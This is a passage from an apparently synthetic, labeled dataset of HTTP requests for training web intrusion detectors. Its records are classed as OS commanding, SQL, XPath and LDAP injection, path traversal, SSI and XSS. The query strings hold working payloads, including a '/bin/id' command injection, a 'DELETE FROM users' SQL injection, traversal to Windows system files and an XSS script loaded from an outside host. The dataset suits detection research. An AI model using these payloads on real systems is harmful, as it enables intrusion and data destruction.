Referer: /0esbS/iahxn/mlana/ms4d8aaj/eeeluhqt.tar.gz
TE: chunked,chunked
Trailer: Pragma
User-Agent: 0SvY3r4k http://www.neefOopi.biz
UA-CPU: Sparc
UA-Disp: 0478,435,16
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/8.8 186.54.26.152, 2.0 www.aieeiolT.tiff, 5.3 235.102.137.209:46775
Transfer-Encoding: compress
Upgrade: L8ahqe/3.3, eola/5.9, onhrln/4.6, iticp/3.3, rnsA6/2.5
Warning: 992 www.tgxepEC.tiff "yer0iasse4hhsuslog" 
X-Forwarded-For: 214.193.235.54
X-Serial-Number: 71827

null

End - Id: 42917
Start - Id: 43081
class: OsCommanding
POST /9tcqs@hW7@zWUX/2euir1ca3rl/iH@37DycHTGSjPNd6o/emp/dICIAIT/i1yR6P1NCh01CEr.jpeg? HTTP/1.1
Content-Length: 183
Content-Language: et,o9riat
Content-Encoding: gzip
Content-Location: http://tmnteve.cz/iGarn/ehnzdrsh/oYoG9/t6n78eMh/geeiR.nsf
Content-MD5: bnQyYW5qY2lwOGFjdExqZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Apr 09 18:04:21 UTC
Last-Modified: Wed, 28 Jan 09 17:47:41 GMT
Host: 204.86.71.51
Connection: aonrisl
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: 9eboddh-m;q=0.9, noo-r8sc, btntfo-c3uw
Cache-Control: only-if-cached
Client-ip: 56.53.104.65
Cookie: Vopeninput-lkK29=6138549;F0u3ifnqe=qewinntDe(a;osaosNttb9l=eiftutrfhno;awto3unals=hexcgttbodyiO
Cookie2: $Version="36"
Date: Sat, 27 May 06 23:55:00 GMT
ETag: "FDUu-B@bbhg0TtN"
Expect: 100-continue
From: twrTzya@l1npan.ch
If-Modified-Since: Tue, 31 Jan 06 06:49:16 GMT
If-Unmodified-Since: Thu, 26 Apr 07 14:46:38 CET
If-None-Match: "CdoZIlMjF2UeQr0mgYGU"
If-Range: *
Max-Forwards: 8
Pragma: no-cache
Authorization: eNell 2ueyo=lNhelA
Range: -57,-072,-891
Referer: http://www.wlp1eRa.cz/ftmt/iiso.swf
Trailer: Pragma
User-Agent: l-evsVL http://www.lrwS.gov
UA-OS: Win98
UA-Pixels: 9690x5155
Via: 7.1 168.214.180.167, aot/9.1 205.104.158.48
Transfer-Encoding: identity
Warning: 478 www.atuy.css "969s" 
X-Forwarded-For: 228.11.44.229
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qh=olsunionhttpNu%3E&RBoh0connectNq-=37476444&RlUAl-Nb=a3wet%26ut9tEonl&ksoqes=02642032&abody0%uJHIsI=t&iatxtuadi3s=%5C%3B++%5C%2Fbin%5C%2Fid%3B&9passwdTFbr4styleo=iif%3Catc9fs&6cT=pm

End - Id: 43081
Start - Id: 48959
class: XPathInjection
GET /sGYC/hq6epfJXnzEeGZIhdCB/dtMg/1Xchildu9I.php4?5qMXDMA=8670&au8we=9nj&n1=%2Fpositionpeo&etgen9=t89m2%7C5wanddiinputr%3Chpl&hzrqftnmhyatuh=raLipnras6sttzi6&kre=szV5eDM&aytg7=oplexec&iddN1cwcytmth=fopositionher9&sfmYhieOe2cr=TSstndfy%27+or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or++++%27uanw%27++%3D+++%27&gjiavhxnteisb=phK0i&onl=29455025&rvg=+arsi%3F HTTP/1.1
Host: www.Tmpa.be
Connection: ltdn
Accept: */*;q=0.7
Accept-Charset: iso-8859-7;q=0.5
Accept-Encoding: deflate;q=0.1
Accept-Language: rsg5bd86-qmuLeam;q=0.2, clhr-rtse4eP2;q=0.2, dtIeahg-bdeo, sd-e, lp-edeu;q=0.2
Cache-Control: max-stale
Client-ip: 170.112.198.15
Cookie: Ah-Z=11344377;indOdnotp=Qa/6ihadlagwheree&ore;Zn-lEWa=te9b3qtqxxnsfi;O2@child9M=xp_;omRshawe=teotcwhestefrYk;axvDsVbshutdown8=z&pst
Cookie2: $Version="580"
Date: Sun, 07 Dec 08 08:12:33 GMT
ETag: "FUkp6cY6gug6IFvU"
Expect: 100-continue
From: aaee5oT@0lekntq.de
If-Modified-Since: Sun, 27 Jul 08 10:53:53 GMT
If-Unmodified-Since: Mon, 07 Jan 08 02:49:18 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 30 Jul 05 10:36:47 UTC
Max-Forwards: 7
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: Basic aHNoYmNkOm5mZUllZWhl
Range: 5-
Referer: /sorm/samj/ilcqrbes.aspx
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: nsenie/7.6.8.5
UA-CPU: MIPS
UA-Disp: 7135,390,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: HTTP/1.6 www.l1sc.js, 9.3 112.35.172.124, 8.8 www.nRssainc.gif
Transfer-Encoding: compress
Upgrade: 6cwot3/1.9
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 58.153.30.65
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48959
Start - Id: 38546
class: LdapInjection
GET /8e9DQJ0Z_BIPe4z/jL/s6/e3izJyrLnmD4Bo2I/h4/OA61srhGz/2lnto3f/eGqa/ehnzad0B0uo0H4it/5ftaes7eaenc5b/yFrFnXrZCMBV6.css?i6e=fay%7E22p-rci&UdeQEJ=h5SFiYC&okapf1=e+ngtscdlRAen%295&iqu4be=518371&aks4Y3=dt9uw&w8ieR0em3iref=iortcecl%3Dicmdorftpt&iri1o=2824230&drieI8eeso5nnpe=yu&6OdHjh=655&dnq=cn&9FX8em=%29++%28++++%7C+++%28++cn%3D*o++++%27brien*%29%28mail%3D*o+%27brien*++++%29 HTTP/1.0
Host: 156.49.247.4
Connection: close
Accept: */*;q=0.3
Accept-Charset: cp-950;q=0.1, utf-8;q=0.3, gb2312;q=0.9
Accept-Encoding: 
Accept-Language: axTdlC-u;q=0.1, 9mee-acorcr;q=0.0, ix1raB-cSyls
Cache-Control: no-cache
Client-ip: 137.169.169.214
Cookie: LiRmckNfromz=59723972;seeoiaod8eio=60;nMat=21
Cookie2: $Version="697"
Date: Wed, 17 Feb 10 12:28:28 CET
ETag: W/"Mx20H@ckCBRko3Mhzz"
Expect: yyiraR
From: zttnih@4elXnnltkb.org
If-Modified-Since: Mon, 29 Jun 09 13:04:30 GMT
If-Unmodified-Since: Fri, 09 Nov 07 09:51:35 CET
If-Match: "dHOK8wv@qaAmD66"
If-None-Match: *
If-Range: Fri, 22 Apr 05 09:34:16 GMT
Max-Forwards: 7726
MIME-Version: 2.4
Pragma: e='mxyeef'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: Basic RTU5ZXA3czM6ZXdEdnlnbW4=
Range: 447-,158917-
Referer: http://www.simsoTtd.com/toim/lxu1ct.aspx
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/2.3 (X11; U; SunOS sun4u 3.7; ge-Fs; rv:0.4.4) Gecko/67319932
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: 2.3 157.122.93.120
Transfer-Encoding: deflate
Upgrade: ghm/2.7, nshsr/6.5, e5b/0.7, Iosom/6.6
Warning: 459 www.duAsdn.jpeg "nz6rni" "Thu, 23 Dec 04 09:07:50 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38546
Start - Id: 42034
class: SqlInjection
GET /fCkxm8tgKvosh/dzt91r/tgtfSn/gM-btzU@-Dc0vg/mev/n6wJOon40RjId.msf?noepDscu4esnh=e6osutehtasiumha15&oom63eenrl=oR7&yoishjot2deEiRi=htfttccgt&rieeoKkppwoh=madiv+e&drsla=989629904&aro=d2Jb8&QhLI=ck9tszs+estgroup+bye&etR=2840836&jaaurs=142388&ewf95=Vhxqees&p6iq=%5Cne%5C+ug6&rcadikgReRfeeOi=ng%27+++%29%3B++++DEL%2F**%2FETE+++++FROM+users+++WHERE+upper%28username%29++%3D+++++upper%28%27admin&a7cn=koninzceonuYseGoi&Ezeartu=lQXmUY2&mEskrre=esgiodt6gcaesp HTTP/1.1
Host: www.eqdlCmm.gov:80
Connection: keep-alive
Accept: audio/*;q=0.5, text/*, image/*
Accept-Charset: x-mac-cyrillic;q=0.7, utf-7, x-mac-icelandic;q=0.8
Accept-Encoding: *
Accept-Language: hgh5be-thn9P;q=0.7
Cache-Control: no-transform
Client-ip: 178.188.215.236
Cookie: 5rvhqve=51175880;ltullm=030707
Cookie2: $Version="324"
Date: Fri, 18 Sep 09 03:59:50 UTC
ETag: "ZTC6b_0Ph8.tX@5"
Expect: 100-continue
From: eliqs@octere.st
If-Modified-Since: Thu, 14 Dec 06 22:20:26 GMT
If-Unmodified-Since: Thu, 26 Aug 04 07:40:34 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Dec 08 04:20:27 UTC
Max-Forwards: 704
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZWdvZTpuaGY0aG4=
Authorization: Digest nonce
Range: -64,-31871,6-
Referer: /qewwds.gif
TE: trailers,trailers
Trailer: Referer
User-Agent: febebEof (jlvTBQIXNW)
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 422x9399
Via: FTP/0.5 www.eaamhx.js
Transfer-Encoding: msot; zwt2iob=igOehlSm
Upgrade: 9zntm/8.2, unrd/8.7, iGIo/4.8, tsi6b/1.8
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 3520691491140757
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42034
Start - Id: 45552
class: PathTransversal
GET /bpaidxRxm/e0H0fjWJ7Gy@q4Ubgl/x94-4aB2z95o4/8.B3joMIXtSmc89/12_/bhiDt/stdsif.php3?E3_GVKNQ5qOK=fd&aoaaojmahsPGnse=ag.57VXRCk&iworSslgb=s66h_85fN.ud&ndhtrehswbfEdnc=30tasgiqht%2F&seuenp5sddeowe=-+si%3AleYifBdoiseL%2F&5YOGZpCoCM_5=617448439&t5owesqimcn=%5CWINNT%5Csystem.ini&2eemxhIqaneeuFu=e9ui6wp-&emttAderaen=a-XUI&wS_nTJEq.s3home=eTzigJ0pIa HTTP/1.0
Host: www.AsiEwltn.org
Connection: hnhoe
Accept: audio/basic;q=0.2
Accept-Charset: x-mac-roman
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 15.78.136.11
Cookie: lnssFaaSxbgbsa6=21811858;ukS=gFhb;ndoNmrtqi=7249;ebuincusleia=u2orotireaT'9i;QVVEaQ90bK5D=62909356
Cookie2: $Version="087"
Date: Tue, 23 Jan 07 18:35:17 CET
ETag: "T1-L@QiGHQrrvjVT2"
Expect: urperzok
From: kccnlkv2@rodignu.de
If-Modified-Since: Sat, 10 Mar 07 12:14:12 CET
If-Unmodified-Since: Fri, 30 Mar 07 09:14:08 GMT
If-Match: "f9VHwgZRm03tTfOvB@u"
If-None-Match: "0Ex2oAaDb_GQ1k03-"
If-Range: *
Max-Forwards: 96
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: 903-3,3-4324,-8
Referer: /9rmooi/uSoHje/e0tyaT/hr3sIa/snewtek.msf
TE: chunked;q=0.8,deflate;q=0.0,trailers
Trailer: If-Unmodified-Since
User-Agent: rtmtA81wnhe6stwelc
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 220x9820
Via: 4.0 185.217.11.215:840
Transfer-Encoding: deflate
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45552
Start - Id: 41673
class: SqlInjection
GET /6SyE7rmtpnruqKdy/ov8wyH/oQ.MwWu@FHrd.pl?tyetoaeko=earftgn&nslrEriYlunoa=%27++++%2B+%28++++SELECT+++TOP+++++1+h9rsacte++++FROM+++++e9eihia%29+++++%2B++%27&zyacFe5eE9=%3Feemmocha&s3sf=y.cSO56.W HTTP/1.0
Host: www.dcaefnKE.net:3100
Connection: keep-alive
Accept: audio/*, audio/basic;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aToa-ewp, 3Esf-ihd, knnl-dh5;q=0.9
Cache-Control: max-age=411
Client-ip: 152.95.8.177
Cookie: lhkssurnnCrx=s3e%;aiynm=Lnab~ein%4o; cnrobjectdndt;aSfymtBgnMag=ldcnt0wget~>;srg]mte-c
Cookie2: $Version="5"
Date: Sun, 19 Apr 09 20:18:23 CET
ETag: "1zVBvOqG3coFp9.PL"
Expect: 7huauig
From: adee1ds@hlecsrsend.fr
If-Modified-Since: Thu, 14 Oct 04 23:52:54 CET
If-Unmodified-Since: Fri, 28 Jul 06 04:51:11 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3589
MIME-Version: 1.5
Pragma: rlitR9S=noasnay
Proxy-Authorization: ne1cn l3hIf=adoal
Authorization: Basic bnhpRWM6bnNhcnNzbA==
Range: -91,787-299778
Referer: /eraot7/ao1uUA.pl
TE: trailers
Trailer: Host
User-Agent: Mozilla/0.6 (Windows; U; WinNT 4.6; ev-xs; rv:6.5.4) Gecko/79423767
UA-CPU: MIPS
UA-Disp: 467,9045,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/1.7 35.198.25.46, FTP/4.6 www.pdicdn.html:9
Transfer-Encoding: identity
Upgrade: Exe2/5.7, all/8.8, cei1I/8.8, syzked/1.5
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 46.66.131.26
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41673
Start - Id: 40895
class: SSI
GET /XVlSbody/t94nvCtZQrAl5OA/hpAU1XM./VinsertJoJvarobjectuV0ZG/pnfnAnaepr/toreceihuosb/WincludeNs2fe.fAzEkc/9a/CHMfbGH6Tbgsound/tHeK2VdGQQ.gif?sqwLna1pnn=ni5-An&imgj-aCYq=xp_l+e4bodyhf%3Bt&lnO=Eyww6l&raOnty=bKTqX-..S5m&aza=%3C%21--++++%23odbc++++statement%3D++%22select+Llme6x%2C+++++Khaer2rr%2C+++++h2d+++from+++otonn+++++order+by++++6%2C+++++361%2C+++++2%22+--%3E&qNIo=dU4_-&n33zT=n3y7scN&unpm=667&.nqQsnq=%3F%3Bn&eis5iaijpei4rbe=edes%2871a HTTP/1.1
Host: 65.37.73.94
Connection: close
Accept: video/*;q=0.8
Accept-Charset: x-mac-arabic, x-mac-chinesetrad, iso-8859-1;q=0.4, windows-1250, koi8-r;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 180.221.196.37
Cookie: trYlbnl2=i ac
Cookie2: $Version="350"
Date: Mon, 29 Dec 08 24:35:07 CET
ETag: "PJL9B8l1.1S_wd_"
Expect: 100-continue
From: 2cEq@o7ggnio.cz
If-Modified-Since: Fri, 07 Aug 09 04:00:05 GMT
If-Unmodified-Since: Tue, 10 Jan 06 14:03:10 UTC
If-Match: "6BLVnQdT-ikd96ol6s"
If-None-Match: *
If-Range: Sat, 09 Aug 08 11:36:45 CET
Max-Forwards: 296
MIME-Version: 4.6
Pragma: sb=s
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: tltUu nost2=n6rl5
Range: 776-,-33080
Referer: /Llrtctsa.php
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: 1osa7ee (eg@gp1E; yePy1ypc; siRXL0BI; sfhiY0Z70; rDv9nyAeLP)
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: FTP/6.8 191.140.76.11:59
Transfer-Encoding: identity
Upgrade: fmoaA/7.1, wyse3a/5.5, tlee/2.8, eejrdw/0.2
Warning: 922 120.154.3.236 "qaolcnn7" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 821981271525659
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40895
Start - Id: 45684
class: PathTransversal
GET /dBz7SHG_86W27metaT/enodeO9FpassthruCbd/aR5n/pt/teEg-AgbX_J7zgOQrN@/uf.shtml?Tn=i&P9eVe=d8zr&aVbnA-NHz-=7ksN&enmsfaagase=n%3A%5Cwinnt%5Cboot.ini&xtdi1kHt=%27niME+nc+fml&u6iien4a=tvhT16s&cat1.sjj=ht8ntun&N1=aaic&aiisxTepod2n=olg%3Dkelfelt&9g9RpPJoq=fosaccess_logecvar%24qn&tc6iobr=u56onyceaj8aobrt&mec=956&6optzfIx6PaGP4=00764840&seaezkThgAbire=02581&Ospcposition4SAf=58603507 HTTP/1.0
Host: www.eeo1N.cz:0
Connection: close
Accept: */*
Accept-Charset: x-mac-greek;q=0.9, ks_c_5601-1987;q=0.8
Accept-Encoding: identity;q=0.8, gzip;q=0.7
Accept-Language: g-oc2oe5;q=0.4, aEei1b-soea, ujeg-h, m0c-hu0lsi
Cache-Control: no-cache
Client-ip: 10.24.0.201
Cookie: tv=8l;selectorNF8=C6n;UJU4G9EuW5H=osrcninnn;dmy7ag5Xuo5tejP=78395511
Cookie2: $Version="731"
Date: Mon, 12 Jun 06 08:32:49 CET
ETag: "te5LXUt5O3OOLfUO"
Expect: to4thr
From: esIpsioy@eehlxsang.it
If-Modified-Since: Thu, 15 Nov 07 02:26:29 CET
If-Unmodified-Since: Tue, 18 Jul 06 02:20:19 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Sep 04 14:57:47 GMT
Max-Forwards: 9902
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest nc=dFd20C70
Authorization: Basic cmVnR3Jlbm46c21hYWs=
Range: -934,-807,-703421
Referer: http://nosp9.com/oxetel1/o56o.swf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/7.3 (compatible; ttcEgoOxua; Mac OS X; Cnhyreiw0a; ei2avctkn; aahfteed2)
UA-CPU: StrongARM
UA-Disp: 3926,182,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 488x430
Via: FTP/1.0 98.252.135.141:259
Transfer-Encoding: compress
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45684
Start - Id: 49191
class: XPathInjection
GET /7ihkotwackcHtkkt4e/rErEhkaO/a0.dll?cn=aentsdeahnie&eqd=6846&froesttgXfOeea=84662599&g2QHmhwN=0308&KLqy_=updated%2FphpH&tuspiu=%28i+++++%3C+count%28iaIbw%2Fchild%3A%3Atext%28%29%29+and+++++j+++%3C++count%28In%2Fchild%3A%3Acomment%28%29%29+++++and++++k+++++%3C++count%28tqsg%2Fchild%3A%3A*%29+++++%29&dAicTsmi=tmpl&v1NXcjoZsock_streamt=tuKVCL-V&rccI1siqtcw=s%27rF2x%3FAn&aiterilfnft=nnTesraoOueg%5Didnh%2B&gT=47&dianrf0wA=7eseWtiI&vX.ZxlinkWdopen=a&snhgoesHi=5699 HTTP/1.0
Host: www.it3didw.biz
Connection: ei1rae
Accept: */*
Accept-Charset: utf-7;q=0.2, x-mac-chinesesimp;q=0.9, x-mac-ce, iso-2022-jp;q=0.9
Accept-Encoding: 
Accept-Language: 5sdIutek-tat2aA
Cache-Control: nsoa=Frqmol
Client-ip: 69.171.64.148
Cookie: cfee=iinclude;trsoeaueen=000;oncpmtdthhfss=263558570
Cookie2: $Version="8"
Date: Mon, 10 Aug 09 11:47:18 CET
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: oSmxlt
From: ir0psea@aO25fruan.gov
If-Modified-Since: Tue, 25 Sep 07 22:58:19 GMT
If-Unmodified-Since: Thu, 17 Nov 05 05:04:01 GMT
If-Match: *
If-None-Match: "3LQ-hCF@CZ49KdqdAEaW"
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 9881
MIME-Version: 7.4
Pragma: odoa=ho
Proxy-Authorization: NTLM c2FoaU9qc3RsdG9uY2VodDg3a2Z4U3NsYWJpaWVhNTZ0bmVzb2g=
Authorization: NTLM TmVhZWNyaTJvOWJBdWFhOTdwVXdzMUtjY3VzZTVncnM3cWU=
Range: 87-,-69535,7135-70843
Referer: /eimnn/sliserl.css
TE: trailers
Trailer: Accept
User-Agent: Oehttzntnh/7.4.9.7.6
UA-CPU: x86
UA-Disp: 809,4297,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 400x881
Via: 0.5 www.jWtx.png
Transfer-Encoding: identity
Upgrade: aon0s/0.1, r0iia/0.9, 2qnen/0.1, yadio/5.6, tezWs/1.2
Warning: 383 www.kosrnic8.htm "9lhYsattMee2onobpr" "Thu, 17 Aug 06 11:17:53 CET"
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49191
Start - Id: 40875
class: SSI
GET /tY5mOu5mFR/ewidtr/0w4yNGcu0/exW/onrd0clr/6cosiaythrtg7r/wf/m2/gn8mMs3lzedc0snanNu.gif?efemjlied9s3ne=%3C%21--++++%23odbc++connect%3D%22vdu8%2ClNu%2Ceh2to%22++++statement%3D%22select+++*+++from++wihh%22--%3E&tvap=+&diofhick=-wkg&LhbndooiaLt8ahL=pewtwoTotn&wlhb=ebO&aedEce2=ho&kxdopenByfJ=ihasNeop&qwdpnnnsBhl=iEqrrfholfobtCh&saipd1I=2915&nntodi98u4aap7=Sas&airsh4uotim9=TntXi%3Btskir HTTP/1.0
Host: www.eec4uy.fr
Connection: keep-alive
Accept: audio/basic
Accept-Charset: shift_jis, cp-950;q=0.7, iso-8859-2, x-mac-japanese
Accept-Encoding: deflate;q=0.3, identity, deflate;q=0.0, compress, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 13.72.58.206
Cookie: eouXquttegai=aeoO;aQaiexu=6110;i6ruj7eocIhn=otmpw0eaT;l2jotu=219109
Cookie2: $Version="63"
Date: Mon, 22 Mar 04 22:04:44 CET
ETag: "KbUataLGPHm7kibu58"
Expect: 1ftgarh=esSyfe
From: xhslhnd@1eneubz.it
If-Modified-Since: Sat, 17 Mar 07 08:04:25 UTC
If-Unmodified-Since: Tue, 02 Jun 09 08:01:30 UTC
If-Match: "FT6m8BxwR2o8CgxLkBIg"
If-None-Match: "U8A2Imsd7wd2@Ey"
If-Range: "MQ86-NJx_XcdWl6"
Max-Forwards: 94
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM NGJvb3RUZVVjZ3R0c05tcmVzY29zNmI3a2xpUnBvcjVubGh4c2Z4
Range: -375,-4
Referer: http://rimflq.gov/A5an/yion6R6/bhedwg/6wra.gif
TE: deflate;q=0.1
Trailer: Upgrade
User-Agent: esnUoo3irqauE
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/9.1 98.242.12.0:80, 9.8 www.1mioo6.gif:49
Transfer-Encoding: onHp; nHtsod=ceaii
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 64687084042208
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40875
Start - Id: 47978
class: XSS
GET /Y6j12Cm7/headZIZmpltlkjmoshya/AodoGbl2doTyetesyma2/sx03O5tznx/nseeaat7utes8hm.jpeg?Nu1apad=rhpH1V2%40VE&EaeqewdyGtuCnd=yhttpsdANxmli&nehi=sshrhS%3Dlpddn&errc=717&HtdsIu8eaeemr1a=thzeBu&lIoVter=orec&wxvsntmshtprx=hoi&ytaeede1oje=%3Cdiv+++++style++++%3D%22+++binding%3A++url%28%5Bhttp%3A%2F%2Fwww.memene.com%2Fscript%2Fra9at.php4%5D%29%3B+++++%22++%3E&Na7inpWlNfo=DsAuRjelfmVer7d5De&6ekblltge=hutEwahpoS&srDZxGtRaccept6.Q=mgf3RH%40j6&2rr3=A3oA8tx&cV3xftelnet_=hs&ieitoitll=%3BOsTsystem%5Ct%5Cjehaniformov%26&binSir=w+cd+ HTTP/1.1
Host: www.iKyg.cz
Connection: odermyra
Accept: application/*, application/*;q=0.8, text/plain;q=0.5
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.1, compress;q=0.8, deflate
Accept-Language: Str-snee;q=0.7, s1Isswzi-eimPhh, ftlh-etO0dRlh;q=0.4
Cache-Control: min-fresh=55126
Client-ip: 235.206.209.30
Cookie: R4XvjM=rRH3p7Wj98SH
Cookie2: $Version="0"
Date: Fri, 31 Aug 07 18:06:30 UTC
ETag: "50fdjcHlrWabzZF"
Expect: 100-continue
From: etro@rlateera.gov
If-Modified-Since: Fri, 14 May 04 10:06:30 UTC
If-Unmodified-Since: Wed, 13 Oct 04 15:45:00 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 986
MIME-Version: 8.2
Pragma: 3EtsTeto=nediHeN3
Proxy-Authorization: Digest nc=b2c271ed
Authorization: perh hrio=Emhlie
Range: -4,8-
Referer: http://www.eCreEuli.gov/7ceviO0/h7eoata/Csto/gkceupt/atnonl6.cgi
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: jdSae (huF2iq3)
UA-CPU: MIPS
UA-Disp: 719,994,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 480x167
Via: 8.6 99.36.19.235, HTTP/3.5 www.mtns9ai.jpeg
Transfer-Encoding: deflate
Upgrade: eat/7.3, imnF/6.2, 5tcs/7.4
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 23.144.158.109
X-Serial-Number: 41529
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47978
Start - Id: 49446
class: XPathInjection
GET /ZqedZ/ejwSZj3plv9oua/tP/mu-VO/itrt/iVj6u9POXImXZbP/Oa9oEonbdEeboceiegh/t7qihuESZlv5AnLYuApZ/EnisiKse/3Ap0wlaeaedeNos3wl.html?auxewdsrmoset=14++or+++1%3C+Hi%2Fsl5o%2Fra%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D637%5D+++or++66%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&Wpv5=csi&drthalpnozgesm=rr5iI&iwns=+giA&ewmWmkdEwec91=tbjJT6QP HTTP/1.0
Host: 243.93.202.162
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.4, deflate, identity, identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 111.175.169.32
Cookie: wnmd218iejyanun=ri?7=locationg8zdh;iiejlhdeestsni2=yshidaSoAfee
Cookie2: $Version="260"
Date: Fri, 04 Mar 05 24:53:22 CET
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: skayetla
From: n5thibdN@srSdAet.st
If-Modified-Since: Mon, 09 Feb 04 11:48:49 GMT
If-Unmodified-Since: Mon, 23 Jan 06 16:47:43 GMT
If-Match: "GcEp3ypmu@-2ZUfMk"
If-None-Match: *
If-Range: *
Max-Forwards: 238
MIME-Version: 6.9
Pragma: m=gelnEeb
Proxy-Authorization: Digest nc=3d94f4fE
Authorization: Basic ZWRsY3JsOm5ub2I=
Range: 894764-6
Referer: /A4ns/otaqomkO/Doaua.jpg
TE: trailers
Trailer: If-Match
User-Agent: fndO/8.6.6.8.3
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 950x8575
Via: FTP/3.2 www.2Opg.html:05816, cnt/4.7 123.191.221.150, FTP/8.1 www.lnwmusA.jpeg:38219
Transfer-Encoding: identity
Upgrade: 4wre/8.6, sckoiq/7.6
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 210.37.128.90
X-Serial-Number: 812184590933752195
----: ---------------
